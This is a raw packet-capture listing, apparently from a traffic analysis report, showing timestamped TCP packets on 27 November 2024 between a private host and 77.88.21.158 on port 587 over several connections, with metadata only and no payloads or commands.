                                                                                                                                Nov 27, 2024 19:18:49.442336082 CET5875003077.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:18:49.442344904 CET5875003077.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:18:49.446412086 CET5875003077.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:18:49.559907913 CET5875003077.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:18:49.559921026 CET5875003077.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:18:49.559931040 CET5875003077.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:18:49.560456991 CET5875003077.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:18:49.560466051 CET5875003077.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:18:50.452188969 CET5875003077.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:18:50.622435093 CET50030587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:03.398997068 CET50028587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:03.525326014 CET5875002877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:03.875926971 CET5875002877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:03.875953913 CET5875002877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:03.876008987 CET50028587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:03.877124071 CET50028587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:03.879131079 CET50031587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:04.003894091 CET5875002877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:04.005822897 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:04.005897999 CET50031587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:05.344616890 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:05.350455046 CET50031587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:05.474808931 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:05.806034088 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:05.806389093 CET50031587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:05.927953005 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:06.259654045 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:06.260133982 CET50031587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:06.386821985 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:06.720278025 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:06.720340967 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:06.720371962 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:06.720530033 CET50031587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:06.720938921 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:06.722533941 CET50031587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:06.726455927 CET50031587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:06.851115942 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:07.182748079 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:07.184864998 CET50031587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:07.305041075 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:07.637275934 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:07.637625933 CET50031587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:07.759253979 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:08.090465069 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:08.133116007 CET50031587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:08.260381937 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:08.612613916 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:08.612865925 CET50031587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:08.737216949 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:09.087346077 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:09.087970972 CET50031587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:09.213757038 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:09.654591084 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:09.654789925 CET50031587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:09.780484915 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:10.112588882 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:10.112924099 CET50031587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:10.113027096 CET50031587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:10.113027096 CET50031587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:10.113101006 CET50031587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:10.114379883 CET50031587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:10.282727957 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:10.282758951 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:10.282768011 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:10.282778025 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:10.282788038 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:10.282815933 CET50031587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:10.282937050 CET50031587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:10.283072948 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:10.283108950 CET50031587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:10.283144951 CET50031587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:10.283184052 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:10.283193111 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:10.283200979 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:10.283246040 CET50031587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:10.283293962 CET50031587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:10.404041052 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:10.404123068 CET50031587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:10.485650063 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:10.485666037 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:10.485677004 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:10.485708952 CET50031587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:10.485774040 CET50031587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:10.487040043 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:10.487101078 CET50031587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:10.523809910 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:10.523880005 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:10.523972988 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:10.523996115 CET50031587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:10.524071932 CET50031587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:10.607665062 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:10.610649109 CET50031587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:10.644999981 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:10.645066023 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:10.645145893 CET50031587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:10.645253897 CET50031587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:10.729971886 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:10.730153084 CET50031587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:10.769557953 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:10.769753933 CET50031587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:10.859925985 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:10.893362045 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:11.014195919 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:11.018166065 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:11.107430935 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:11.107449055 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:11.138509035 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:11.138535976 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:11.138645887 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:11.138667107 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:11.138689995 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:11.138729095 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:11.138870955 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:11.138880014 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:11.138911009 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:11.226142883 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:11.226160049 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:11.265085936 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:11.265176058 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:11.265194893 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:11.265290022 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:11.265333891 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:11.265368938 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:12.137042046 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:12.273952007 CET50031587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:12.752585888 CET50031587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:12.872944117 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:13.205220938 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:13.205693960 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:13.206156015 CET50031587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:13.206156015 CET50031587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:13.210472107 CET50032587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:13.326617002 CET5875003177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:13.330528975 CET5875003277.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:13.331252098 CET50032587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:14.631259918 CET5875003277.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:14.634655952 CET50032587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:14.758598089 CET5875003277.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:15.086268902 CET5875003277.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:15.086508989 CET50032587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:15.206619024 CET5875003277.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:15.534303904 CET5875003277.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:15.534761906 CET50032587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:15.658253908 CET5875003277.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:15.987226009 CET5875003277.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:15.987360001 CET5875003277.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:15.987371922 CET5875003277.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:15.987401962 CET50032587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:15.987952948 CET5875003277.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:15.988003016 CET50032587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:15.990238905 CET50032587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:16.113663912 CET5875003277.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:16.441471100 CET5875003277.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:16.443736076 CET50032587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:16.568095922 CET5875003277.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:16.895880938 CET5875003277.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:16.896677017 CET50032587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:17.016736984 CET5875003277.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:17.345501900 CET5875003277.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:17.482490063 CET50032587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:20.299854040 CET50030587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:20.419815063 CET5875003077.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:20.752299070 CET5875003077.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:20.752720118 CET5875003077.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:20.752785921 CET50030587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:20.752856970 CET50030587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:20.753331900 CET50033587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:20.879435062 CET5875003077.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:20.880100965 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:20.880188942 CET50033587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:20.909401894 CET50032587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:20.909702063 CET50032587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:20.955475092 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:21.029392004 CET5875003277.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:21.030047894 CET5875003277.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:21.030102968 CET50032587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:21.075433969 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:21.075508118 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:22.184061050 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:22.184243917 CET50033587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:22.311264038 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:22.644680023 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:22.644833088 CET50033587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:22.764833927 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:22.949794054 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:22.950483084 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:23.070367098 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:23.098561049 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:23.099129915 CET50033587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:23.219327927 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:23.395632029 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:23.395801067 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:23.518955946 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:23.554377079 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:23.554477930 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:23.554491043 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:23.554534912 CET50033587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:23.554943085 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:23.555003881 CET50033587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:23.557051897 CET50033587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:23.677448034 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:23.843940020 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:23.844307899 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:23.969481945 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:24.011245966 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:24.013542891 CET50033587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:24.140857935 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:24.296570063 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:24.296674013 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:24.296686888 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:24.296756983 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:24.297269106 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:24.297327995 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:24.298832893 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:24.474906921 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:24.475109100 CET50033587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:24.487601995 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:24.595253944 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:24.812782049 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:24.814100981 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:24.929292917 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:24.929579973 CET50033587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:24.934314013 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:25.049875021 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:25.273689985 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:25.273937941 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:25.394212008 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:25.432915926 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:25.433245897 CET50033587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:25.553504944 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:25.719516993 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:25.719815969 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:25.839941025 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:25.899486065 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:25.899785995 CET50033587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:26.022823095 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:26.187005043 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:26.187282085 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:26.307570934 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:26.363445044 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:26.363615036 CET50033587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:26.489648104 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:26.638323069 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:26.638783932 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:26.765636921 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:26.823235989 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:26.823612928 CET50033587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:26.823666096 CET50033587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:26.823683023 CET50033587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:26.823744059 CET50033587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:26.826574087 CET50033587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:27.063919067 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:27.063935995 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:27.063945055 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:27.063982964 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:27.063992023 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:27.063996077 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:27.064001083 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:27.063999891 CET50033587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:27.064065933 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:27.064081907 CET50033587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:27.064116955 CET50033587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:27.067713022 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:27.067723989 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:27.067768097 CET50033587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:27.184046984 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:27.184129000 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:27.184134960 CET50033587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:27.184345961 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:27.187817097 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:27.187841892 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:27.187881947 CET50033587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:27.187906981 CET50033587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:27.187907934 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:27.187943935 CET50033587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:27.187951088 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:27.187995911 CET50033587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:27.305675030 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:27.305740118 CET50033587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:27.309710979 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:27.309772968 CET50033587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:27.309783936 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:27.309830904 CET50033587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:27.354197979 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:27.354296923 CET50033587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:27.432519913 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:27.432548046 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:27.432612896 CET50033587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:27.478849888 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:27.478945017 CET50033587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:27.496936083 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:27.522201061 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:27.522248030 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:27.559216022 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:27.559237003 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:27.559322119 CET50033587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:27.648791075 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:27.648807049 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:27.648905993 CET50033587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:27.685313940 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:27.685399055 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:27.685410023 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:27.685461998 CET50033587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:27.685467005 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:27.685508966 CET50033587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:27.805372000 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:27.805455923 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:27.884259939 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:27.884694099 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:27.884694099 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:27.884799957 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:27.885020018 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:27.886113882 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:27.925889015 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:27.926107883 CET5875003377.88.21.158192.168.2.4
